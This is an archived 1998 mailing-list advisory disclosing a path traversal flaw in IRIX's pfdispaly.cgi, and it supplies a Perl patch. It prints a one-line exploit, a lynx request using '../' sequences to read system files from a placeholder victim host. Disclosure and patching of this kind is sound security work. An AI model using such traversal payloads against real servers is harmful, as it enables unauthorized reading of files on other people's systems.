X-RDate: Tue, 17 Mar 1998 16:42:29 +0500 (ESK)
Date: Tue, 17 Mar 1998 00:06:48 +0100
From: "J.A. Gutierrez" <[email protected]>
To: [email protected]Subject: IRIX performer_tools bug
Do you remember the /cgi-bin/handler bug?
Well, more of the same:
Software:
IRIX 6.2
performer_tools.sw.webtools (Performer API Search Tool 2.2)
/var/www/cgi-bin/pfdispaly.cgi
Bug: Anyone can read files (as 'nobody') from your system:
Exploit:
lynx -source \
'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
for instance :-)
Fix:
*** pfdispaly.cgi.O Mon Mar 16 23:13:34 1998
--- pfdispaly.cgi Mon Mar 16 23:36:29 1998
***************
*** 14,19 ****
--- 14,20 ----
$fullcgiroot = "/var/www$cgiroot";
$shortfilepath = "$ARGV[0]";
+ $shortfilepath =~ s/\.{2,}//g;
$fullfilepath = "$maindocroot$shortfilepath";
($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;
Note: I haven't tested the other Performer CGI's too much,
maybe they will have more nasty bugs.
(in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
prepended; but somewhere 'dangerous' characters are escaped)
There is another bug at pfsearch.cgi; which lacks of
a
print "Content-type: text/html\n\n";
line, so you get garbage in your browser.
(and even worse, you have to enable JavaScript if you want
to use this set of CGIs...)
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
